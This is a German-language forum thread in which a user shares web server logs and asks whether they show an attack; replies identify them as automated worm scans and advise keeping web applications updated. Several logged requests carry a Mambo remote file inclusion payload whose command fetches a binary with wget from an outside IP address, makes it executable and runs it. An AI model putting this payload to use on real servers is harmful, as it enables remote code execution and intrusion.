1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen

Angriff auf Web Server?

Dieses Thema im Forum "macOS & OS X" wurde erstellt von RUMTom, 12.02.06.

  1. RUMTom

    RUMTom Grahams Jubiläumsapfel

    Dabei seit:
    11.09.04
    Beiträge:
    104
    Moin,

    ich habe jetzt seit ein paar Tagen auf einen frisch installiertes System 10.4 einen Web Server laufen. Nur mal so zum testen, mit recht wenig Traffic über dyndns.org.

    Beim durchschauen der Web-Logs sind mir zwei Sachen aufgefallen:

    Code:
    217.153.134.21 - - [11/Feb/2006:09:36:59 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    217.153.134.21 - - [11/Feb/2006:09:37:00 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    217.153.134.21 - - [11/Feb/2006:09:37:02 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    217.153.134.21 - - [11/Feb/2006:09:37:03 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    217.153.134.21 - - [11/Feb/2006:09:37:04 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    217.153.134.21 - - [11/Feb/2006:09:37:05 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    217.153.134.21 - - [11/Feb/2006:09:37:06 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    217.153.134.21 - - [11/Feb/2006:09:37:08 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    217.153.134.21 - - [11/Feb/2006:09:37:09 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    217.153.134.21 - - [11/Feb/2006:09:37:10 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    Ich könnte mir denken, daß hier jemand versucht, ein nicht vorhandenes Gästebuch oder Blog zuzumüllen.

    Aber was könnte es hiermit auf sich haben? :

    Code:
    207.5.192.108 - - [12/Feb/2006:04:04:34 +0100] "GET /RUMtrol.html HTTP/1.1" 200 728 "http://us.f353.mail.yahoo.com/ym/ShowLetter?MsgId=8430_1528707_67232_1619_52_0_7849_-1_0&Idx=3&YY=40765&inc=25&order=down&sort=date&pos=0&view=a&head=b&box=Inbox" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    oder auch das?

    Code:
    217.153.134.21 - - [11/Feb/2006:09:36:54 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    217.153.134.21 - - [11/Feb/2006:09:36:55 +0100] "GET /cache/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    217.153.134.21 - - [11/Feb/2006:09:36:56 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    217.153.134.21 - - [11/Feb/2006:09:36:58 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 200 549 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

    Muss man sich darüber Sorgen machen, oder ist das der ganz normale Wahnsinn??

    Gruß aus dem nebligen Hamburg
     
  2. MacMark

    MacMark Biesterfelder Renette

    Dabei seit:
    01.01.05
    Beiträge:
    4.709
    Das Netz ist voll mit Zombies. Zombies sind von Schadprogrammen übernommene Windows-Installationen, die ihren Wirt nutzen, um sich weiter zu verbreiten bzw. automatisch nach bekannten Lücken auf anderen Rechnern im Netz zu suchen und diese dann zu nutzen. Da wird alles probiert.
     
  3. RUMTom

    RUMTom Grahams Jubiläumsapfel

    Dabei seit:
    11.09.04
    Beiträge:
    104
    Aja.
    Da du von Windows-Installationen schreibst, brauche ich mir wohl keine weiteren Gedanken drüber machen.
     
  4. fantaboy

    fantaboy Leipziger Reinette

    Dabei seit:
    09.04.04
    Beiträge:
    1.788
    ich glaube nicht, das diese sache etwas mit windows zu tun hat. leider bin ich kein profi, kann also die daten auch nicht wirklich entschlüsseln. aber es scheint doch so zu sein, als ob es sich hier um einen angriff bzw. spam auf ein blog handelt. mambo, wordpress etc. sind cms- oder blogprogramme.
    ich tippe mal darauf, dass ein bot versucht, kommentare in ein blog zu spammen. allerdings bin ich mit der url auch nirgends hingekommen. wenn man aber die letzte eins weglässt, kommt man auf ne polnische seite. polnisch kann ich aber auch nicht.
    ich würde zumindest diese url mal sperren, falls das bei dir möglich ist. und auf den blogs findest du bestimmt infos, wie man damit umgeht.
    hoffe, konnte dir trotz halbwissen ein bischen weiterhelfen.


    gruss

    jürgen
     
  5. Nogger

    Nogger Damasonrenette

    Dabei seit:
    05.11.05
    Beiträge:
    494
    Das ganze kommt von Würmern, die über Fehler in älteren Versionen von Web-Applikationen eine Rechner befallen haben und von dem aus einfach blind versuchen eine weitere Installation der fehlerhaften Versionen im Netz zu finden, um sich weiterzuverbreiten.

    Wenn du wissen willst, was es alles ist, einfach nur googlen. Z.B. nach "xmlrpc.php worm", gibt dann u.a. http://www.lurhq.com/slapperv2.html zurück.

    Code:
    207.5.192.108 - - [12/Feb/2006:04:04:34 +0100] "GET /RUMtrol.html HTTP/1.1" 200 728 "http://us.f353.mail.yahoo.com/ym/ShowLetter?MsgId=8430_1528707_67232_1619_52_0_7849_-1_0&Idx=3&YY=40765&inc=25&order=down&sort=date&pos=0&view=a&head=b&box=Inbox" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    Jemand hat einen Link in einer Mail im Yahoo Webmail angeklickt (oder Yahoo läßt IFrames o.ä. in HTML-Mails zu) und der Link hat als Serveradresse deine aktuelle IP-Adresse oder (versehentlich) deinen dyndns-Namen gehabt. Komisch, aber uninteressant und bedeutungslos. Ich finde es übrigens merkwürdig, das Yahoo keine Maßnahmen ergreift um den Referrer zu löschen. Oder jemand hat es umgangen.

    Code:
    217.153.134.21 - - [11/Feb/2006:09:36:54 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    
    Wieder ein Wurm, der diesmal nach einer fehlerhaften, alte Mambo-Installation sucht. http://www.heise.de/newsticker/meldung/67006

    Es ist das normale Hintergrundrauschen. Du hast die anvisierte Software nicht installiert, also kann es dir egal sein. Wenn du irgendwelceh Web-Applikationen installierst, dann achte darauf, daß sie immer auf dem aktuellen Stand sind. Eigentlich alle Anbieter haben Mailinglisten, in denen sie über wichtige Updates informieren.

    Wenn du für deine Versuche keine Zugriffe vo naußen brauchst, also nur lokal arbeitest, dann kannst du in der Firewall auch den Zugriff von außen auf den Webserver ausschalten. Du selbst kannst immernoch über
    Code:
    http://localhost
    auf den Webserver zugreifen.
     
    MacMark und fantaboy gefällt das.

Diese Seite empfehlen